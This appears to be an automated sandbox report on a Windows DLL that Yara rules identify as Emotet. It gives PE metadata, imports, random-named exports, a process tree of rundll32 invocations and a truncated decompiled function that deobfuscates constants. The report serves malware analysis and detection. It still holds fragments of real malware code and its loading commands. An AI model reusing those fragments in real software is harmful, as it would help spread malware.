                        Entrypoint:0x1001a401
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                        TLS Callbacks:0x1000c500
                        CLR (.Net) Version:
                        OS Version Major:6
                        OS Version Minor:0
                        File Version Major:6
                        File Version Minor:0
                        Subsystem Version Major:6
                        Subsystem Version Minor:0
                        Import Hash:609402ef170a35cc0e660d7d95ac10ce

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        cmp dword ptr [ebp+0Ch], 01h
                        jne 00007F04C0B74847h
                        call 00007F04C0B74BD8h
                        push dword ptr [ebp+10h]
                        push dword ptr [ebp+0Ch]
                        push dword ptr [ebp+08h]
                        call 00007F04C0B746F3h
                        add esp, 0Ch
                        pop ebp
                        retn 000Ch
                        push ebp
                        mov ebp, esp
                        push dword ptr [ebp+08h]
                        call 00007F04C0B750EEh
                        pop ecx
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        jmp 00007F04C0B7484Fh
                        push dword ptr [ebp+08h]
                        call 00007F04C0B78BD4h
                        pop ecx
                        test eax, eax
                        je 00007F04C0B74851h
                        push dword ptr [ebp+08h]
                        call 00007F04C0B78C50h
                        pop ecx
                        test eax, eax
                        je 00007F04C0B74828h
                        pop ebp
                        ret
                        cmp dword ptr [ebp+08h], FFFFFFFFh
                        je 00007F04C0B751B3h
                        jmp 00007F04C0B75190h
                        push ebp
                        mov ebp, esp
                        push 00000000h
                        call dword ptr [1002808Ch]
                        push dword ptr [ebp+08h]
                        call dword ptr [10028088h]
                        push C0000409h
                        call dword ptr [10028040h]
                        push eax
                        call dword ptr [10028090h]
                        pop ebp
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000324h
                        push 00000017h
                        call dword ptr [10028094h]
                        test eax, eax
                        je 00007F04C0B74847h
                        push 00000002h
                        pop ecx
                        int 29h
                        mov dword ptr [1005AF18h], eax
                        mov dword ptr [1005AF14h], ecx
                        mov dword ptr [1005AF10h], edx
                        mov dword ptr [1005AF0Ch], ebx
                        mov dword ptr [1005AF08h], esi
                        mov dword ptr [1005AF04h], edi
                        mov word ptr [eax], es

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x583900x8ac.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x58c3c0x3c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x1bb0.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x56fdc0x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x571000x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x570300x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x280000x154.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x264f40x26600False0.546620521173data6.29652715831IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rdata0x280000x313fa0x31400False0.822468868972data7.43227371512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x5a0000x18440xe00False0.270647321429data2.60881097454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .pdata0x5c0000x66c0x800False0.3583984375data2.21689595795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .reloc0x5d0000x1bb00x1c00False0.784598214286data6.62358237634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Imports

                        DLLImport
                        KERNEL32.dllHeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                        USER32.dllGetDC, ReleaseDC, GetWindowRect

                        Exports

                        NameOrdinalAddress
                        Control_RunDLL10x100010a0
                        ajkaibu20x100016c0
                        akyncbgollmj30x10001480
                        alrcidxljxybdggs40x10001860
                        bgmotrriehds50x10001820
                        bojkfvynhhupnooyb60x100019f0
                        bujuoqldqlzaod70x10001800
                        bunsahctogxzts80x100019e0
                        cjogbtafwukesw90x10001830
                        csbbcaopuok100x100016a0
                        cyqrjpaeorjur110x100015f0
                        dlrzuyaeqj120x10001840
                        egiimrq130x10001850
                        evhgyts140x100014f0
                        fdqpjjjyuw150x100017e0
                        finabzjyxhxnnuuv160x10001510
                        fkeacqpbbfw170x10001910
                        fuwsgzf180x10001790
                        fzbmpailk190x10001980
                        gamsrhauvgl200x10001810
                        gjfqgtgk210x10001a10
                        gwsmfxfmekkyr220x100018b0
                        haymuvtatadeydqmk230x10001530
                        hqruohhkvpdalhq240x10001620
                        htdaydfvtjlujwcaj250x10001660
                        hzyrvjtx260x100017c0
                        ifnsupqhxkwj270x10001870
                        ijhgowlpmypocg280x10001720
                        ispjhrqaxnyflnn290x100015a0
                        iszvcqv300x100017a0
                        ixgucop310x100018d0
                        jcdvrhrguqtjpkc320x100016b0
                        jkfyadsdpoks330x100019c0
                        kfzgxmljkwaqy340x10001730
                        kzfvroxozxufciczm350x10001740
                        lpstjqa360x10001900
                        ltkoyvzovzkqemyw370x10001630
                        mdigcwjymnzvgaql380x100014d0
                        mefathlzguuhqodfx390x10001950
                        mgsrmfbja400x10001500
                        mrxhcceopg410x100014a0
                        nafhmuoq420x100018f0
                        nefxgpc430x100018a0
                        nrehxpiznrppeu440x10001690
                        nucocnvjyqp450x100018e0
                        obxoxtcbntaxofr460x10001890
                        ofrzojd470x100016e0
                        oofbctfc480x10001550
                        opzpazspbecyjojf490x100015b0
                        oqoigff500x10001a00
                        oujlzhzvhjh510x100016f0
                        ovpsanbypajv520x100015e0
                        pblpcaadqbdxyb530x10001680
                        ragwdgnyohftj540x100017d0
                        rfosmac550x10001710
                        rgymbuetvifqjqdlo560x10001930
                        rmoxbxbbgidnbds570x10001970
                        rxnkmfbycdcc580x10001560
                        sefltbc590x10001880
                        sgieprcsphl600x100019a0
                        shpcmnqzvyltgdt610x100016d0
                        slktbekupvmdbt620x100015c0
                        sormivnk630x10001570
                        tdblkstlyin640x10001600
                        tkllyrc650x10001650
                        tkwpnvfqnbpbdqe660x10001a20
                        tnhtgnjrabqakgeke670x10001700
                        tzpmcwwig680x10001520
                        uceklmggjof690x10001610
                        ukwdddyj700x10001640
                        uwnaptydgur710x10001940
                        vjusqoeo720x10001580
                        vnyufpq730x10001590
                        vsrwmkhzkrtlexxb740x100014e0
                        wermsdfzb750x10001770
                        wkhpfdjkypy760x100014c0
                        wksndtayhfm770x100015d0
                        wnjvxspilxpchq780x10001670
                        wuqwfssiddrcl790x10001570
                        wyyhtqptznbrknitg800x100017f0
                        wzkcijdvadq810x10001540
                        wzxlvxuyy820x100019b0
                        xhtxeilfgsghxik830x10001780
                        xvdijhconoukll840x100014b0
                        ybbwnezvxfafm850x10001750
                        yeylpreasnzamgac860x100019d0
                        ypkidshxgzkkehc870x100018c0
                        ypzvmpfbgai880x10001760
                        zbrzizodycg890x10001990
                        zdiuqcnzg900x10001920
                        zfkwwtxd910x10001490
                        zktykfwmaehxg920x10001600
                        zmkbqvofdhermov930x10001960
                        zvtqmkitgmzgo940x100017b0

                        Network Behavior

                        No network behavior found

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: loaddll32.exe PID: 6544 Parent PID: 5616

                        General

                        Start time:09:47:32
                        Start date:02/12/2021
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
                        Imagebase:0xd50000
                        File size:893440 bytes
                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.638369835.000000000131B000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.662291713.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.662291713.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.663123528.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.663123528.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.693214956.000000000131B000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.641147134.000000000131B000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.663179674.000000000131B000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.662403503.000000000131B000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.640836289.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.640836289.0000000001210000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 4652 Parent PID: 6544

                        General

                        Start time:09:47:32
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                        Imagebase:0x2a0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6088 Parent PID: 6544

                        General

                        Start time:09:47:33
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.637148475.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.637148475.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000003.597595639.0000000003259000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000003.597595639.0000000003259000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6256 Parent PID: 4652

                        General

                        Start time:09:47:33
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.636690720.00000000032EA000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.636271952.0000000003100000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.636271952.0000000003100000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4532 Parent PID: 6544

                        General

                        Start time:09:47:37
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.638357953.0000000000650000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.638357953.0000000000650000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.638392292.00000000006FA000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6612 Parent PID: 6544

                        General

                        Start time:09:47:41
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.634927199.0000000002E0A000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 6920 Parent PID: 560

                        General

                        Start time:09:48:54
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff6b7590000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 6040 Parent PID: 6256

                        General

                        Start time:09:49:32
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 5280 Parent PID: 6088

                        General

                        Start time:09:49:32
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt",WgszfYRBINQe
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 4112 Parent PID: 4532

                        General

                        Start time:09:49:43
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: rundll32.exe PID: 1508 Parent PID: 6612

                        General

                        Start time:09:49:47
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                        Imagebase:0xc60000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 7160 Parent PID: 560

                        General

                        Start time:09:49:49
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase:0x7ff6b7590000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 6936 Parent PID: 7160

                        General

                        Start time:09:49:50
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544
                        Imagebase:0xea0000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 3520 Parent PID: 6544

                        General

                        Start time:09:49:52
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 324
                        Imagebase:0xea0000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 6800 Parent PID: 7160

                        General

                        Start time:09:50:01
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6544 -ip 6544
                        Imagebase:0xea0000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 5636 Parent PID: 560

                        General

                        Start time:09:50:02
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff6b7590000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: WerFault.exe PID: 3424 Parent PID: 6544

                        General

                        Start time:09:50:02
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 332
                        Imagebase:0xea0000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 1040 Parent PID: 560

                        General

                        Start time:09:50:27
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff6b7590000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Analysis Process: svchost.exe PID: 6264 Parent PID: 560

                        General

                        Start time:09:50:35
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff6b7590000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: loaddll32.exe PID: 6544 Parent PID: 5616 loaddll32.exeCOMMON

                          Executed Functions

                          Function 01231291, Relevance: 10.4, Strings: 8, Instructions: 383COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 97%
                          			E01231291() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed short* _t429;
				signed int _t440;
				signed int _t442;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t461;
				signed int* _t491;
				void* _t492;
				signed short* _t498;
				signed int* _t499;

				_t499 =  &_v1728;
				_v1572 = 0x85db5f;
				_v1572 = _v1572 + 0xabd9;
				_v1572 = _v1572 ^ 0x00868711;
				_v1664 = 0xec20c6;
				_v1664 = _v1664 ^ 0x8ebb32ad;
				_v1664 = _v1664 >> 0xe;
				_v1664 = _v1664 ^ 0xc9da4224;
				_v1664 = _v1664 ^ 0xc9d33214;
				_v1672 = 0x7aeab7;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 >> 0x10;
				_v1672 = _v1672 * 0x29;
				_t442 = 0;
				_v1672 = _v1672 ^ 0x00070a11;
				_t492 = 0x1e2f185;
				_v1636 = 0x817462;
				_v1636 = _v1636 | 0x24691976;
				_v1636 = _v1636 + 0x95f6;
				_v1636 = _v1636 ^ 0x24ec5d0b;
				_v1644 = 0x77a6a5;
				_v1644 = _v1644 + 0xffffc90e;
				_v1644 = _v1644 << 1;
				_v1644 = _v1644 ^ 0x00e59261;
				_v1680 = 0xf31be;
				_v1680 = _v1680 | 0xd650deff;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 + 0xf487;
				_v1680 = _v1680 ^ 0xc00e87b4;
				_v1688 = 0x6142cc;
				_v1688 = _v1688 << 0x10;
				_v1688 = _v1688 | 0xd67339e5;
				_v1688 = _v1688 << 0xd;
				_v1688 = _v1688 ^ 0xe7390e48;
				_v1576 = 0x6cc5f;
				_v1576 = _v1576 | 0x19b4cce0;
				_v1576 = _v1576 ^ 0x19baa07f;
				_v1724 = 0xbf4a96;
				_t444 = 0x5e;
				_v1724 = _v1724 / _t444;
				_v1724 = _v1724 << 6;
				_t445 = 6;
				_v1724 = _v1724 / _t445;
				_v1724 = _v1724 ^ 0x001fb8e8;
				_v1624 = 0x45a64f;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 >> 0xf;
				_v1624 = _v1624 ^ 0x000b503d;
				_v1684 = 0xb25e00;
				_v1684 = _v1684 >> 8;
				_v1684 = _v1684 ^ 0xb04bdaf3;
				_v1684 = _v1684 | 0x528abcb4;
				_v1684 = _v1684 ^ 0xf2c0da40;
				_v1716 = 0xe3eb63;
				_v1716 = _v1716 + 0x4bb4;
				_v1716 = _v1716 | 0x24706c23;
				_v1716 = _v1716 + 0xffff0bad;
				_v1716 = _v1716 ^ 0x24f80a2d;
				_v1660 = 0x9c5bdc;
				_v1660 = _v1660 | 0xcf478232;
				_v1660 = _v1660 >> 1;
				_t446 = 0xe;
				_v1660 = _v1660 / _t446;
				_v1660 = _v1660 ^ 0x076aa47c;
				_v1668 = 0xa625ec;
				_t447 = 0x7d;
				_v1668 = _v1668 / _t447;
				_v1668 = _v1668 + 0x365e;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x31544487;
				_v1708 = 0x6b5520;
				_v1708 = _v1708 + 0xf8d2;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 >> 4;
				_v1708 = _v1708 ^ 0x0d8d8c55;
				_v1600 = 0x9430bd;
				_t448 = 0x36;
				_v1600 = _v1600 / _t448;
				_v1600 = _v1600 ^ 0x000afaf2;
				_v1620 = 0x86cfb6;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 + 0xffff889a;
				_v1620 = _v1620 ^ 0x0109f82c;
				_v1564 = 0xa631e3;
				_v1564 = _v1564 + 0xf4ba;
				_v1564 = _v1564 ^ 0x00a80ade;
				_v1676 = 0x7979a8;
				_v1676 = _v1676 << 7;
				_v1676 = _v1676 << 0x10;
				_v1676 = _v1676 + 0x9d4f;
				_v1676 = _v1676 ^ 0xd402292e;
				_v1700 = 0x9cb407;
				_t449 = 0x74;
